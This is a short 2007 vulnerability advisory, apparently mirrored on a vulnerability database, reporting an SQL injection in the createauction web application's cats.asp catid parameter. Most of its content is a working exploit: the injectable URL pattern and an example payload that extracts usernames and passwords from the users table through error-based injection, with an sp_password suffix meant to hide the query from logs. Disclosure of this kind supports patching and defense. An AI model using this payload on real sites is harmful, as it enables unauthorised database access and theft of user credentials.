Lucene search
SecurityvulnsSECURITYVULNS:DOC:15641HistoryJan 09, 2007 - 12:00 a.m.
createauction (cats.asp) Remote SQL Injection Vulnerability
2007-01-0900:00:00
vulners.com
26
createauction (catid) Remote SQL Injection Vulnerability
============================ HItamputih Crew ====================
hitamputih Advisory
Discovered By : IbnuSina
#-----------------------------------------------------------
Software: createauction
Vendor : http://www.createauction.com/
Method: SQL Injection
Thanks To : akukasih,nyubi,irvian and all #hitamputih crew
[[SQL]]]---------------------------------------------------------
http://[target]/[path]/cats.asp?catid=[SQL]
ex:
http://[target]/[path]/cats.asp?catid=1%20%20and%201=convert(int,(select%20top%201%20username%2b'/'%2bpassword%20from%20users))–sp_password
#########################################################################################